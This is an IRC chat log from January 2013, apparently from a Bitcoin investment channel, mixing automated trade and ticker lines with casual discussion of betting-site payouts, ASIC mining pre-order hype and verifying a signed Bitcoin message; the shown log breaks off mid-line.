[S.DICE] 1200 @ 0.00535586 = 6.427 BTC [-] Jan 19 05:54:54 sorta like marriage. you know it doesn't end well statistically and do it anyway. Jan 19 05:55:05 [MPEX] [S.MPOE] 21657 @ 0.00068 = 14.7268 BTC [+] Jan 19 05:57:00 i wont do it Jan 19 05:58:05 hehe many say that. Jan 19 05:58:20 too bad bitbet only allows for 1 year bets Jan 19 06:00:17 hahaah what do the winner get, the girl ? Jan 19 06:00:27 "i bet i won't marry. if i do, you can have her" Jan 19 06:00:39 sounds faustian. Jan 19 06:01:04 you can have her and the dog. Jan 19 06:01:14 you keep the milk ? Jan 19 06:01:20 ofc ;) Jan 19 06:01:20 sorta like marriage. you know it doesn't end well statistically and do it anyway. << what about when it does? Jan 19 06:01:32 some people win dice games too. Jan 19 06:01:43 so is it all just a statistic? Jan 19 06:01:50 hence the word statistically. Jan 19 06:01:58 ;) Jan 19 06:02:04 quantum popescu Jan 19 06:05:28 it's only statistically b/c we don't yet know the fundamental nature of reality Jan 19 06:06:04 we're probably close tho Jan 19 06:06:14 how about this for reality - http://www.quickmeme.com/meme/3smh94/ Jan 19 06:07:30 i just love how, if you get into fine enough detail, particles, waves, atoms, none of those are practical models of reality Jan 19 06:07:39 (or parts of it, rather) Jan 19 06:08:04 it's a good way to explain it for our current psychology Jan 19 06:08:17 it's kind of like that old story mimsy was the borgroves Jan 19 06:09:38 yah Jan 19 06:09:42 great story Jan 19 06:11:38 Bugpowder_: surprises me more and more each day Jan 19 06:12:03 mimsy? Jan 19 06:12:07 yea Jan 19 06:12:13 not many people have read it Jan 19 06:12:14 read it when I was a kid Jan 19 06:12:20 heh Jan 19 06:12:24 before it was cool Jan 19 06:12:27 in the science fiction hall of fame Volume I Jan 19 06:12:34 edited by asimov Jan 19 06:12:50 1929-1964 Jan 19 06:16:24 it's not that old. Jan 19 06:19:06 mircea_popescu: http://siliconangle.com/blog/2013/01/15/bitcoinstore-plans-to-take-on-the-world-of-online-electronics-retail-with-btc/ Jan 19 06:19:26 yeah. good for it. Jan 19 06:19:45 not really news by now is it ? Jan 19 06:20:36 not really Jan 19 06:22:03 [MPEX] [S.MPOE] 16443 @ 0.00067848 = 11.1562 BTC [-] Jan 19 06:22:50 https://bitcointalk.org/index.php?topic=137163.msg1463417#msg1463417 Jan 19 06:22:51 lmao Jan 19 06:23:08 lol Jan 19 06:23:40 https://bitcointalk.org/index.php?topic=137170 Jan 19 06:23:43 this went over well. Jan 19 06:34:08 Quote from: yochdog on January 16, 2013, 09:33:08 PM Jan 19 06:34:08 I too will offer a large percentage for Mr Shavers. Jan 19 06:34:08 I purchased bad in a very large amount and would be very generous with any recovery. Jan 19 06:34:11 bah these people. Jan 19 06:34:27 they know better than anyone, all the way to the wall. Jan 19 06:35:09 [MPEX] [S.MPOE] 12076 @ 0.00067848 = 8.1933 BTC [-] Jan 19 06:35:11 [MPEX] [S.MPOE] 3024 @ 0.00067423 = 2.0389 BTC [-] Jan 19 06:36:13 [HAVELOCK] [SDICE] 2 @ 0.55 = 1.1 BTC [+] Jan 19 06:37:12 [HAVELOCK] [SDICE] 15 @ 0.565 = 8.475 BTC [+] Jan 19 06:38:12 pigeons you around ? Jan 19 06:47:20 [MPEX] [S.MPOE] 26650 @ 0.00068 = 18.122 BTC [+] Jan 19 06:55:31 [MPEX] [S.MPOE] 6800 @ 0.00068 = 4.624 BTC [+] Jan 19 06:58:06 [MPEX] [S.MPOE] 4321 @ 0.00067453 = 2.9146 BTC [-] Jan 19 06:58:07 [MPEX] [S.MPOE] 4730 @ 0.00067423 = 3.1891 BTC [-] Jan 19 07:06:39 [MPEX] [S.MPOE] 4321 @ 0.00067977 = 2.9373 BTC [+] Jan 19 07:06:41 [MPEX] [S.MPOE] 629 @ 0.00068 = 0.4277 BTC [+] Jan 19 07:22:30 http://tinysong.com/LD1b Jan 19 07:25:06 gotta love the melvins Jan 19 07:34:03 "We took multiple 20k+ refunds left and right without batting and eye lash because we believe in this project and we know we will be releasing our bASIC Bitcoin mining units sooner than everyone else, especially our good friends BFL." Jan 19 07:34:07 is tom on drugs nao ? Jan 19 07:40:01 [MPEX] [S.MPOE] 12100 @ 0.00068 = 8.228 BTC [+] Jan 19 07:41:32 [02:15:36] Diablo-D3: any good news regarding DMC? Jan 19 07:41:33 nope Jan 19 07:41:50 [MPEX] [S.MPOE] 4321 @ 0.0006775 = 2.9275 BTC [-] Jan 19 07:41:52 [MPEX] [S.MPOE] 279 @ 0.00067725 = 0.189 BTC [-] Jan 19 07:45:33 [MPEX] [S.MPOE] 4321 @ 0.0006775 = 2.9275 BTC [+] Jan 19 07:45:35 [MPEX] [S.MPOE] 1479 @ 0.00067725 = 1.0017 BTC [-] Jan 19 07:49:25 ;;ticker Jan 19 07:49:26 BTCUSD ticker | Best bid: 15.39001, Best ask: 15.46999, Bid-ask spread: 0.07998, Last trade: 15.39001, 24 hour volume: 60508.16264848, 24 hour low: 15.25000, 24 hour high: 15.94390, 24 hour vwap: 15.58379 Jan 19 07:49:34 retracing ? Jan 19 08:00:46 [MPEX] [S.MPOE] 23494 @ 0.00067756 = 15.9186 BTC [+] Jan 19 08:00:47 [MPEX] [S.MPOE] 4328 @ 0.00067926 = 2.9398 BTC [+] Jan 19 08:20:19 [MPEX] [S.BBET] 250 @ 0.00129998 = 0.325 BTC [+] Jan 19 08:22:59 [MPEX] [S.MPOE] 13741 @ 0.00067725 = 9.3061 BTC [-] Jan 19 08:23:01 [MPEX] [S.MPOE] 2759 @ 0.00067423 = 1.8602 BTC [-] Jan 19 08:33:42 [BTCTC] [ESECURITYSABTC] 1 @ 0.88 BTC [-] Jan 19 08:34:32 [MPEX] [S.MPOE] 4137 @ 0.00067423 = 2.7893 BTC [-] Jan 19 08:34:34 [MPEX] [S.MPOE] 3300 @ 0.00067074 = 2.2134 BTC [-] Jan 19 08:34:35 [MPEX] [S.MPOE] 34500 @ 0.00066658 = 22.997 BTC [-] Jan 19 08:34:36 [MPEX] [S.MPOE] 19692 @ 0.00066529 = 13.1009 BTC [-] Jan 19 08:34:38 [MPEX] [S.MPOE] 26200 @ 0.00066385 = 17.3929 BTC [-] Jan 19 08:34:39 [MPEX] [S.MPOE] 15471 @ 0.00066362 = 10.2669 BTC [-] Jan 19 08:46:13 [MPEX] [S.MPOE] 4321 @ 0.00066372 = 2.8679 BTC [+] Jan 19 08:46:15 [MPEX] [S.MPOE] 6637 @ 0.00066362 = 4.4044 BTC [-] Jan 19 08:46:16 [MPEX] [S.MPOE] 2250 @ 0.00066336 = 1.4926 BTC [-] Jan 19 08:46:18 [MPEX] [S.MPOE] 9396 @ 0.00066319 = 6.2313 BTC [-] Jan 19 08:49:35 [MPEX] [S.MPOE] 11977 @ 0.00066319 = 7.943 BTC [-] Jan 19 08:49:41 [MPEX] [S.MPOE] 10700 @ 0.000661 = 7.0727 BTC [-] Jan 19 08:53:17 [BTCTC] [GOLD] 1 @ 1.1227 BTC [-] Jan 19 08:59:56 [MPEX] [S.DICE] 908 @ 0.00535392 = 4.8614 BTC [-] Jan 19 08:59:58 [MPEX] [S.DICE] 361 @ 0.00515816 = 1.8621 BTC [-] Jan 19 08:59:59 [MPEX] [S.DICE] 1300 @ 0.00514107 = 6.6834 BTC [-] Jan 19 09:00:00 [MPEX] [S.DICE] 1000 @ 0.00491501 = 4.915 BTC [-] Jan 19 09:00:04 [MPEX] [S.DICE] 5000 @ 0.004915 = 24.575 BTC [-] Jan 19 09:00:05 [MPEX] [S.DICE] 10000 @ 0.00491 = 49.1 BTC [-] Jan 19 09:00:07 [MPEX] [S.DICE] 1000 @ 0.0049 = 4.9 BTC [-] Jan 19 09:00:08 [MPEX] [S.DICE] 440 @ 0.00478099 = 2.1036 BTC [-] Jan 19 09:00:09 [MPEX] [S.DICE] 600 @ 0.00474002 = 2.844 BTC [-] Jan 19 09:00:11 [MPEX] [S.DICE] 500 @ 0.00473693 = 2.3685 BTC [-] Jan 19 09:00:12 [MPEX] [S.DICE] 1100 @ 0.00454709 = 5.0018 BTC [-] Jan 19 09:00:13 [MPEX] [S.DICE] 4000 @ 0.00454708 = 18.1883 BTC [-] Jan 19 09:00:44 [MPEX] [S.MPOE] 10200 @ 0.00066073 = 6.7394 BTC [-] Jan 19 09:02:31 [MPEX] [S.MPOE] 21700 @ 0.00065983 = 14.3183 BTC [-] Jan 19 09:02:33 [MPEX] [S.MPOE] 1626 @ 0.0006589 = 1.0714 BTC [-] Jan 19 09:04:13 [MPEX] [S.MPOE] 3856 @ 0.00066073 = 2.5478 BTC [+] Jan 19 09:33:19 can someone explain to me how the winnings are calculated at bitbet? Jan 19 09:33:25 [MPEX] [O.BTCUSD.C060T] 500 @ 0.61599036 = 307.9952 BTC [-] Jan 19 09:33:34 [MPEX] [O.BTCUSD.C100T] 615 @ 0.35798393 = 220.1601 BTC [-] Jan 19 09:33:57 [MPEX] [O.BTCUSD.C110T] 1000 @ 0.29348232 = 293.4823 BTC [-] Jan 19 09:34:01 [MPEX] [O.BTCUSD.C120T] 1000 @ 0.22898071 = 228.9807 BTC [-] Jan 19 09:34:25 Jewish_James the side that prevails splits up the bets of the side that lost. Jan 19 09:34:34 proportionally by the time weights Jan 19 09:36:04 and the wager amount? Jan 19 09:36:59 what do you mean ? Jan 19 09:43:47 [MPEX] [S.MPOE] 15144 @ 0.00066363 = 10.05 BTC [+] Jan 19 09:43:53 [MPEX] [S.MPOE] 24700 @ 0.00065817 = 16.2568 BTC [-] Jan 19 09:43:55 [MPEX] [S.MPOE] 21982 @ 0.00065758 = 14.4549 BTC [-] Jan 19 09:43:56 [MPEX] [S.MPOE] 13396 @ 0.00065697 = 8.8008 BTC [-] Jan 19 09:45:26 most of the propositions are very one-sided, so say you pick the favored choice , does everyone have to make equal sized bets, or could someone bet a huge amount and greatly reduce the winnings for everyone else if that side wins Jan 19 09:47:12 I guess a better question is how are your winnings calculated? Jan 19 09:49:45 lol, i just asked my 1st question Jan 19 09:50:33 ... Jan 19 09:50:37 look at one of the closed bets maybe ? Jan 19 09:53:18 The earnings are proportional to bet amount multiplied by "weight". Usually the more time passes, the less weight bets have. Jan 19 09:57:57 http://www.just-food.com/news/russia-bans-us-meat-imports-tested-for-ractopamin_id121499.aspx Jan 19 09:57:59 that's low. Jan 19 09:58:05 seriously ?! russia bans us meat ? Jan 19 09:58:11 30 years ago... Jan 19 10:18:49 [MPEX] [S.MPOE] 13650 @ 0.00067036 = 9.1504 BTC [+] Jan 19 10:19:42 *hanbot* morning Jan 19 10:21:14 [HAVELOCK] [SDICE] 2 @ 0.52 = 1.04 BTC [-] Jan 19 10:22:14 [HAVELOCK] [SDICE] 1 @ 0.51 BTC [-] Jan 19 10:24:14 [HAVELOCK] [SDICE] 10 @ 0.5 = 5 BTC [-] Jan 19 10:26:31 [BTCTC] [COGNITIVE] 10 @ 0.41 = 4.1 BTC [-] Jan 19 10:31:24 [MPEX] [S.MPOE] 6350 @ 0.00067036 = 4.2568 BTC [+] Jan 19 10:44:10 [MPEX] [S.DICE] 1000 @ 0.0048 = 4.8 BTC [+] Jan 19 10:46:22 so im assuming the weight number a percentage? I'm trying to figure out the payout formula including the 1% fee and preventing the house from gambling its own money which i assume it doesn't do Jan 19 10:47:45 is this the first time you're betting on anything ? Jan 19 10:53:49 no, just doing other things and i havent got the payouts calculated correctly Jan 19 10:54:08 ive only guessed the formula twice Jan 19 10:58:13 [MPEX] [S.MPOE] 8900 @ 0.00067036 = 5.9662 BTC [+] Jan 19 10:58:14 [MPEX] [S.MPOE] 9552 @ 0.000657 = 6.2757 BTC [-] Jan 19 10:58:19 http://bitbet.us/bet/53/bitcoin-below-13-00-before-january-15th-2013/ <-- looks like you can loose even if you bet on the right side (last bet) Jan 19 11:11:51 [MPEX] [S.MPOE] 9800 @ 0.000657 = 6.4386 BTC [-] Jan 19 11:18:42 FabianB hmmm Jan 19 11:19:06 FabianB the reason is this : site takes 1% Jan 19 11:19:23 if you bet very late and the odds are very low you can end up paying a little like that. Jan 19 11:19:33 say there's 100 btc to 1 btc Jan 19 11:19:37 vig is thus 1.01 btc Jan 19 11:20:09 if you put the 100th btc in late enough you might not actually win enough of the 1btc to make up for the 1% you'll be charged Jan 19 11:20:52 ic, its 1% of the bet size Jan 19 11:21:21 yeah Jan 19 11:22:18 [MPEX] [S.MPOE] 9148 @ 0.000657 = 6.0102 BTC [-] Jan 19 11:22:19 [MPEX] [S.MPOE] 4719 @ 0.00065697 = 3.1002 BTC [-] Jan 19 11:27:57 [MPEX] [S.MPOE] 4321 @ 0.000671 = 2.8994 BTC [+] Jan 19 11:27:58 [MPEX] [S.MPOE] 9900 @ 0.00067109 = 6.6438 BTC [+] Jan 19 11:27:59 [MPEX] [S.MPOE] 7879 @ 0.00067432 = 5.313 BTC [+] Jan 19 11:35:15 [HAVELOCK] [SDICE] 1 @ 0.51 BTC [+] Jan 19 11:37:34 [MPEX] [S.MPOE] 4300 @ 0.00065715 = 2.8257 BTC [-] Jan 19 11:38:19 people who use ruby never had computers with no disk space Jan 19 11:38:35 pigeons https://bitcointalk.org/index.php?topic=136953.msg1463866#msg1463866 Jan 19 11:38:37 she found it. Jan 19 11:40:48 well they really do think its a neat idea, and you won't be able to convince them otherwise until they turn 13 at least Jan 19 11:44:47 [MPEX] [S.MPOE] 6800 @ 0.0006576 = 4.4717 BTC [+] Jan 19 11:44:48 [MPEX] [S.MPOE] 23500 @ 0.00066014 = 15.5133 BTC [+] Jan 19 11:56:20 [MPEX] [S.MPOE] 14000 @ 0.00066014 = 9.242 BTC [+] Jan 19 12:13:26 [MPEX] [S.MPOE] 21 @ 0.00065715 = 0.0138 BTC [-] Jan 19 12:13:28 [MPEX] [S.MPOE] 2000 @ 0.000657 = 1.314 BTC [-] Jan 19 12:13:29 [MPEX] [S.MPOE] 2356 @ 0.00065697 = 1.5478 BTC [-] Jan 19 12:13:31 [MPEX] [S.MPOE] 16916 @ 0.00065603 = 11.0974 BTC [-] Jan 19 12:18:01 [MPEX] [S.DICE] 577 @ 0.00494481 = 2.8532 BTC [+] Jan 19 12:28:14 [MPEX] [S.MPOE] 5750 @ 0.00065603 = 3.7722 BTC [-] Jan 19 12:39:52 [MPEX] [S.MPOE] 4321 @ 0.00065994 = 2.8516 BTC [+] Jan 19 12:39:59 [MPEX] [S.MPOE] 5829 @ 0.00066014 = 3.848 BTC [+] Jan 19 12:55:32 [MPEX] [S.MPOE] 4321 @ 0.00065607 = 2.8349 BTC [-] Jan 19 12:55:33 [MPEX] [S.MPOE] 4979 @ 0.00065603 = 3.2664 BTC [-] Jan 19 12:55:34 [MPEX] [S.MPOE] 5550 @ 0.00065589 = 3.6402 BTC [-] Jan 19 13:00:41 [MPEX] [S.MPOE] 4321 @ 0.00065864 = 2.846 BTC [+] Jan 19 13:00:43 [MPEX] [S.MPOE] 7129 @ 0.00065867 = 4.6957 BTC [+] Jan 19 13:08:43 pigeons btw, were you able to verify the rota guy ? Jan 19 13:12:10 ah just saw it Jan 19 13:13:21 kinda busy, get back as soon as i can Jan 19 13:18:30 [MPEX] [S.MPOE] 4321 @ 0.00065595 = 2.8344 BTC [-] Jan 19 13:22:27 [MPEX] [S.MPOE] 15350 @ 0.00065591 = 10.0682 BTC [-] Jan 19 13:23:18 haven't seen jcpham either. yo! Jan 19 13:26:35 my computer is 2/3 between debian unstable to experimental downgrade to unstable. the version of libc i last installed bitcoin against is no longer on my machine Jan 19 13:27:03 does it verify for you mircea_popescu ? Jan 19 13:27:06 i was yo!ing at jcpham Jan 19 13:27:12 yeah Jan 19 13:27:13 omg i never tried Jan 19 13:27:26 ok well anybody out there Jan 19 13:27:28 im a party not teh judge! Jan 19 13:27:29 in the peanut gallery Jan 19 13:27:35 you're the oens getting paid Jan 19 13:27:50 im verifying this out in the public, openly Jan 19 13:27:58 interactive Jan 19 13:28:49 blockchain.info probably implements signing different than the reference client, i know armory does also Jan 19 13:29:57 lets see how far i get without a login Jan 19 13:30:06 1 click Jan 19 13:30:48 password: rogersmommaisahoyo Jan 19 13:32:24 [MPEX] [S.MPOE] 12550 @ 0.00065589 = 8.2314 BTC [-] Jan 19 13:32:25 [MPEX] [S.MPOE] 1714 @ 0.00065514 = 1.1229 BTC [-] Jan 19 13:32:49 lolwut Jan 19 13:32:52 ooh now this is a smooth platform mircea_popescu Jan 19 13:32:58 blockchain.info Jan 19 13:33:32 integrated "satoshidice" button under "games" right in the wallet Jan 19 13:33:54 what can possibly go wrong Jan 19 13:34:10 ok receive money -> other actions -> verify message Jan 19 13:35:49 message has the wrong length, need a or something somewhere Jan 19 13:36:13 Error Verifying MessageSignature has the wrong length Jan 19 13:36:42 ah i see HBNlxhUDnEKbMl1p082ergE+ekRZINRmr12/DpZQy0sODhxGTE40HukSnPL+mQDDy8yg+bjQblA+NsJe Jan 19 13:37:02 ah Jan 19 13:37:32 but when you view the source of the double cherry reticulated lorry award for shitty html you get Jan 19 13:37:35 HBNlxhUDnEKbMl1p082ergE+ekRZINRmr12/DpZQy0sODhxGTE40HukSnPL+mQDDy8yg+bjQblA+NsJeI3XyoEs= Jan 19 13:37:39 one sec Jan 19 13:38:04 eh ? Jan 19 13:38:10 Message Successfully Verified Jan 19 13:38:11 i see the whole thing, ends in = Jan 19 13:38:36 yeah of course the site works with whatever browser you use Jan 19 13:38:55 ie6 is picky though Jan 19 13:39:02 you srsly on ie6 ?! Jan 19 13:39:10 no Jan 19 13:39:17 wtf Jan 19 13:39:29 anyway loks good Jan 19 13:39:50 let me review that original transaction confirm we are talking about the correct address in question Jan 19 13:42:59 you should prolly consult with teh other two too Jan 19 13:44:23 [BTCTC] [BTC-BOND] 2 @ 0.01 = 0.02 BTC [+] Jan 19 13:45:34 yah Jan 19 13:49:39 [BTCTC] [MININGCO.ETF] 2 @ 0.5 = 1 BTC Jan 19 13:50:02 [BTCTC] [BASIC-MINING] 1 @ 0.33 BTC [+] Jan 19 13:50:57 [MPEX] [S.MPOE] 8600 @ 0.00065514 = 5.6342 BTC [-] Jan 19 14:12:31 March may seem a long time away as we all have ASIC blue balls right now, but its really not that far away, and I salute and congratulate all of you who have had the testicular fortitude to stick it out with us because you my friends will receive the ultimate reward. Sure Avalon may get some units out before the Chinese new year but that is sure to be a very limited number. On the other hand our assembly house has an u Jan 19 14:12:31 nlimited assembly capacity and as soon as the Chinese new year ends we will have 16,000 freshly fabbed and packaged ASIC chips and we will be assembling those PCB's at FULL CAPACITY !We will be shipping ALL CURRENT ORDERS IN THE MONTH OF MARCH AND WE STILL HAVE ROOM FOR MORE ORDERS SO Get IN WHILE YOU STILL CAN! I stake my personal name and word on that. Jan 19 14:12:37 this dude is seriously entertaining. Jan 19 14:16:39 wow Jan 19 14:16:53 thats the same guy that did icarus and lancelot? Jan 19 14:16:54 right? Jan 19 14:18:01 no nzhang is with avalon i thought, and this says "sure avalon may getsome out before us" Jan 19 14:18:17 sounds braggadacious enough to be inabfl Jan 19 14:18:49 WE STILL HAVE ROOM FOR MORE ORDERS SO Get IN WHILE YOU STILL CAN! I stake my personal name and word on that. Jan 19 14:19:03 well mircea_popescu, what's the correct answer? Jan 19 14:20:10 Ukto: wuts this: https://bitfunder.com/asset/Exchange.ESIF#tab_description Jan 19 14:20:41 Possibly questionable Jan 19 14:20:44 :P Jan 19 14:21:23 he claims to have history Jan 19 14:21:23 that's like worse than "bankroll my poker game" Jan 19 14:21:35 of doing things for btc for ppl for a year Jan 19 14:21:40 But I havent heard of it Jan 19 14:21:42 cause at least in poker you control more variables Jan 19 14:24:43 WE STILL HAVE ROOM FOR MORE ORDERS SO Get IN WHILE YOU STILL CAN! I stake my personal name and word on that. Jan 19 14:25:04 i bet Jan 19 14:29:23 [MPEX] [S.MPOE] 12686 @ 0.00065514 = 8.3111 BTC [-] Jan 19 14:29:25 [MPEX] [S.MPOE] 8100 @ 0.00065483 = 5.3041 BTC [-] Jan 19 14:29:26 [MPEX] [S.MPOE] 10000 @ 0.00065421 = 6.5421 BTC [-] Jan 19 14:29:27 [MPEX] [S.MPOE] 26500 @ 0.0006542 = 17.3363 BTC [-] Jan 19 14:29:29 [MPEX] [S.MPOE] 8514 @ 0.00065414 = 5.5693 BTC [-] Jan 19 14:32:32 jurov: there? Jan 19 14:39:56 pigeons: agreed Jan 19 14:40:03 i sent him a msg that he needs to be alot more explicit Jan 19 14:40:11 i think thats why he ahsnt made forum posting Jan 19 14:40:29 and descriptive Jan 19 14:41:24 [BTCTC] [BTC-TRADING-PT] 70 @ 0.1435 = 10.045 BTC [-] Jan 19 14:45:18 pigeons the impersonal name ? i dunno Jan 19 14:48:38 and the quote was from basic guy Jan 19 14:48:39 cablepair Jan 19 14:50:44 i think bfl started a "war" with their asic announce Jan 19 14:50:51 then the others swalled and followed suite Jan 19 14:50:59 and reality is none of them are actually ready Jan 19 14:51:07 or were anwhere near when they announced Jan 19 14:51:13 and inserted foot in mouth Jan 19 14:51:28 the closest we have see for sure, is asicminers chips Jan 19 14:51:45 at least that seems realistic, but as of this point I am not questioning friedcat Jan 19 14:54:33 [MPEX] [S.MPOE] 4060 @ 0.00065591 = 2.663 BTC [+] Jan 19 14:54:35 [MPEX] [S.MPOE] 24790 @ 0.00065624 = 16.2682 BTC [+] Jan 19 14:56:51 [MPEX] [S.MPOE] 19386 @ 0.00065414 = 12.6812 BTC [-] Jan 19 14:56:52 [MPEX] [S.MPOE] 4164 @ 0.0006539 = 2.7228 BTC [-] Jan 19 15:18:02 [MPEX] [S.MPOE] 1873 @ 0.0006539 = 1.2248 BTC [-] Jan 19 15:18:04 [MPEX] [S.MPOE] 23500 @ 0.00065308 = 15.3474 BTC [-] Jan 19 15:18:05 [MPEX] [S.MPOE] 327 @ 0.00065279 = 0.2135 BTC [-] Jan 19 15:18:45 [MPEX] [S.DICE] 2500 @ 0.0049475 = 12.3688 BTC [+] Jan 19 15:19:35 less than 24 hrs to go http://www.avalon-asics.com/ Jan 19 15:28:04 [MPEX] [S.MPOE] 5841 @ 0.00065279 = 3.8129 BTC [-] Jan 19 15:28:05 [MPEX] [S.MPOE] 7800 @ 0.00065193 = 5.0851 BTC [-] Jan 19 15:28:07 [MPEX] [S.MPOE] 6709 @ 0.00065104 = 4.3678 BTC [-] Jan 19 15:51:57 [MPEX] [S.MPOE] 23200 @ 0.00065624 = 15.2248 BTC [+] Jan 19 15:52:49 [MPEX] [S.MPOE] 7600 @ 0.00065624 = 4.9874 BTC [+] Jan 19 15:54:08 [MPEX] [S.MPOE] 25 @ 0.00065624 = 0.0164 BTC [+] Jan 19 15:55:30 [BTCTC] [RSM] 94 @ 0.0067 = 0.6298 BTC [-] Jan 19 15:55:32 [BTCTC] [RSM] 499 @ 0.0072 = 3.5928 BTC [+] Jan 19 15:55:34 [BTCTC] [RSM] 180 @ 0.0075 = 1.35 BTC [+] Jan 19 15:57:12 ;;ticker Jan 19 15:57:13 BTCUSD ticker | Best bid: 15.30001, Best ask: 15.34759, Bid-ask spread: 0.04758, Last trade: 15.30001, 24 hour volume: 47116.38437355, 24 hour low: 15.25000, 24 hour high: 15.84304, 24 hour vwap: 15.54929 Jan 19 16:00:08 not sure Jan 19 16:00:11 i only 'saw' them in the pics Jan 19 16:00:13 a week ago Jan 19 16:00:14 or so Jan 19 16:00:16 when they arrived Jan 19 16:00:26 They could be anything Jan 19 16:00:32 yeah Jan 19 16:00:35 as i said, from what can be seen Jan 19 16:00:37 so one else even has that though Jan 19 16:05:31 ;;gpg everify freenode:#bitcoin-otc:d0815ec0bd1b03121c4b135e2613d39aa80cd5ff766dffe906dc1b8b Jan 19 16:05:31 Error: In order to authenticate, you must be present in one of the following channels: #bitcoin-otc;#bitcoin-otc-foyer;#bitcoin-otc-ru;#bitcoin-otc-eu;#bitcoin-otc-uk;#bitcoin-otc-bans Jan 19 16:06:19 then again asicminer has the advantage that it could be run as a ponzi for quite a while. Jan 19 16:06:45 yea for years Jan 19 16:06:52 they've discreetely skipped the "samples to community" part, the "we have the chips, they're hashing, just a few" story can be strung till july. Jan 19 16:06:58 bfl has no such benefit. Jan 19 16:08:01 but in all fairness, there's no actual proof this has anything akin to the color of truth. fact is we don't know. Jan 19 16:12:48 This guy just blew his wad on S.DICE Jan 19 16:12:49 http://blockchain.info/address/1GATbuCSWbWCueEL3W9z7EQyJACHjHYH8e?filter=0 Jan 19 16:13:03 http://satoshidice.com/lookup.php?tx=&limit=100&min_bet=10&status=ALL Jan 19 16:13:08 Putting 400BTC bets down Jan 19 16:13:10 lost it all Jan 19 16:13:17 aww Jan 19 16:13:31 i bet .01 btc earlier Jan 19 16:13:36 got totally scammed. Jan 19 16:13:53 [MPEX] [S.MPOE] 4300 @ 0.00065624 = 2.8218 BTC [+] Jan 19 16:13:53 the fee was .0355 wtf?!? Jan 19 16:14:26 its weird, S.DICE sells off a bit AFTER the whales show up? Jan 19 16:16:05 http://bitbet.us/bet/147/mtgox-out-of-business-by-end-of-year/ Jan 19 16:16:07 how about that. Jan 19 16:20:48 [MPEX] [S.MPOE] 18100 @ 0.00065174 = 11.7965 BTC [-] Jan 19 16:20:50 [MPEX] [S.MPOE] 991 @ 0.00065104 = 0.6452 BTC [-] Jan 19 16:20:51 [MPEX] [S.MPOE] 10000 @ 0.00065103 = 6.5103 BTC [-] Jan 19 16:20:53 [MPEX] [S.MPOE] 6009 @ 0.00065102 = 3.912 BTC [-] Jan 19 16:26:51 [MPEX] [S.MPOE] 19535 @ 0.00065624 = 12.8196 BTC [+] Jan 19 16:26:53 [MPEX] [S.MPOE] 1965 @ 0.00065704 = 1.2911 BTC [+] Jan 19 16:31:16 [MPEX] [S.DICE] 89 @ 0.00525532 = 0.4677 BTC [+] Jan 19 16:42:04 ;;ticker Jan 19 16:42:05 BTCUSD ticker | Best bid: 15.33000, Best ask: 15.34760, Bid-ask spread: 0.01760, Last trade: 15.34760, 24 hour volume: 47649.20971090, 24 hour low: 15.25000, 24 hour high: 15.84304, 24 hour vwap: 15.54152 Jan 19 16:42:12 ;;calc 0.0757365 * 15.54152 Jan 19 16:42:13 1.17706032948 Jan 19 16:46:01 [MPEX] [S.MPOE] 26091 @ 0.00065102 = 16.9858 BTC [-] Jan 19 16:46:03 [MPEX] [S.MPOE] 1069 @ 0.00065096 = 0.6959 BTC [-] Jan 19 16:59:03 [MPEX] [S.MPOE] 4321 @ 0.00065698 = 2.8388 BTC [+] Jan 19 16:59:05 [MPEX] [S.MPOE] 14135 @ 0.00065704 = 9.2873 BTC [+] Jan 19 16:59:06 [MPEX] [S.MPOE] 17298 @ 0.00065867 = 11.3937 BTC [+] Jan 19 16:59:07 [MPEX] [S.MPOE] 3636 @ 0.00065889 = 2.3957 BTC [+] Jan 19 16:59:09 [MPEX] [S.MPOE] 28521 @ 0.00066014 = 18.8279 BTC [+] Jan 19 16:59:10 [MPEX] [S.MPOE] 17971 @ 0.00066199 = 11.8966 BTC [+] Jan 19 16:59:11 [MPEX] [S.MPOE] 28374 @ 0.00066244 = 18.7961 BTC [+] Jan 19 16:59:12 [MPEX] [S.MPOE] 23950 @ 0.00066291 = 15.8767 BTC [+] Jan 19 16:59:13 [MPEX] [S.MPOE] 23283 @ 0.00066334 = 15.4445 BTC [+] Jan 19 16:59:15 [MPEX] [S.MPOE] 17100 @ 0.00066418 = 11.3575 BTC [+] Jan 19 16:59:15 [MPEX] [S.MPOE] 7183 @ 0.00066443 = 4.7726 BTC [+] Jan 19 16:59:16 [MPEX] [S.MPOE] 665 @ 0.00067432 = 0.4484 BTC [+] Jan 19 16:59:17 [MPEX] [S.MPOE] 3063 @ 0.00067482 = 2.067 BTC [+] Jan 19 16:59:18 [MPEX] [S.MPOE] 4562 @ 0.00067482 = 3.0785 BTC [+] Jan 19 16:59:20 [MPEX] [S.MPOE] 9738 @ 0.00067483 = 6.5715 BTC [+] Jan 19 17:02:20 [MPEX] [S.MPOE] 22775 @ 0.00067483 = 15.3693 BTC [+] Jan 19 17:15:13 [BTCTC] [ESECURITYSABTC] 1 @ 0.8959 BTC [+] Jan 19 17:16:06 [BTCTC] [BASIC-MINING] 2 @ 0.33 = 0.66 BTC [+] Jan 19 17:16:50 [BTCTC] [RSM] 320 @ 0.0075 = 2.4 BTC [+] Jan 19 17:21:33 [MPEX] [S.MPOE] 4321 @ 0.00065343 = 2.8235 BTC [-] Jan 19 17:21:35 [MPEX] [S.MPOE] 10711 @ 0.00065334 = 6.9979 BTC [-] Jan 19 17:22:06 [BTCTC] [RSM] 65 @ 0.0076 = 0.494 BTC [+] Jan 19 17:22:24 [BTCTC] [RSM] 7 @ 0.0076 = 0.0532 BTC [+] Jan 19 17:23:51 [BTCTC] [BASIC-MINING] 18 @ 0.33 = 5.94 BTC [+] Jan 19 17:23:53 [BTCTC] [BASIC-MINING] 15 @ 0.338 = 5.07 BTC [+] Jan 19 17:41:42 [MPEX] [S.MPOE] 7000 @ 0.00066963 = 4.6874 BTC [+] Jan 19 17:46:33 [MPEX] [S.MPOE] 2600 @ 0.00066963 = 1.741 BTC [+] Jan 19 17:46:35 [MPEX] [S.MPOE] 6800 @ 0.00066617 = 4.53 BTC [-] Jan 19 17:57:12 [MPEX] [S.MPOE] 4321 @ 0.00067465 = 2.9152 BTC [+] Jan 19 17:57:14 [MPEX] [S.MPOE] 8560 @ 0.00067483 = 5.7765 BTC [+] Jan 19 18:05:50 [MPEX] [S.MPOE] 4321 @ 0.00067388 = 2.9118 BTC [-] Jan 19 18:05:50 [MPEX] [S.MPOE] 6929 @ 0.00067363 = 4.6676 BTC [-] Jan 19 18:08:56 [BTCTC] [RSM] 5 @ 0.0076 = 0.038 BTC [+] Jan 19 18:09:59 [MPEX] [S.MPOE] 23071 @ 0.00067363 = 15.5413 BTC [-] Jan 19 18:10:00 [MPEX] 